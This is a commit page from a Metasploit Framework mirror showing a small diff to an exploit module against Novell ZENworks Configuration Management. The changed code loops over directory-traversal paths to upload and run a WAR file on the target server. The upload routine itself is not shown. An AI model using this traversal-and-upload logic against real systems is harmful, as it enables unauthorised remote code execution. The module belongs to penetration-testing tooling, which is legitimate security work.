infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Make TOMCAT_PATH optional

bug/bundler_fix
jvazquez-r7 2015-05-01 13:54:39 -05:00
parent d2a7d83f71
commit d38adef5cc
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 11 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
modules/exploits/multi/http/zcm_file_upload.rb
View File

@ -53,11 +53,11 @@ class Metasploit3 < Msf::Exploit::Remote
[ [
Opt::RPORT(443), Opt::RPORT(443),
OptBool.new('SSL', OptBool.new('SSL',
[ true, 'Use SSL', true ]), [true, 'Use SSL', true]),
OptString.new('TARGETURI', OptString.new('TARGETURI',
[ true, 'The base path to ZCM / ZENworks Suite', '/zenworks/' ]), [true, 'The base path to ZCM / ZENworks Suite', '/zenworks/']),
OptString.new('TOMCAT_PATH', OptString.new('TOMCAT_PATH',
[ false, 'The Tomcat webapps traversal path (from the temp directory)', '' ]) [false, 'The Tomcat webapps traversal path (from the temp directory)'])
], self.class) ], self.class)
end end
@ -116,18 +116,14 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
if datastore['TOMCAT_PATH'] != '' tomcat_paths = []
if not upload_war_and_exec(datastore['TOMCAT_PATH']) if datastore['TOMCAT_PATH']
return tomcat_paths << datastore['TOMCAT_PATH']
end end
else tomcat_paths.concat(['../../../opt/novell/zenworks/share/tomcat/webapps/', '../webapps/'])
# These paths should cover the Virtual Appliance, Windows and SLES installations
tomcat_paths = [ '../../../opt/novell/zenworks/share/tomcat/webapps/', '../webapps/' ] tomcat_paths.each do |tomcat_path|
if not upload_war_and_exec(tomcat_paths[0]) break if upload_war_and_exec(tomcat_path)
if not upload_war_and_exec(tomcat_paths[1])
return
end
end
end end
end end
end end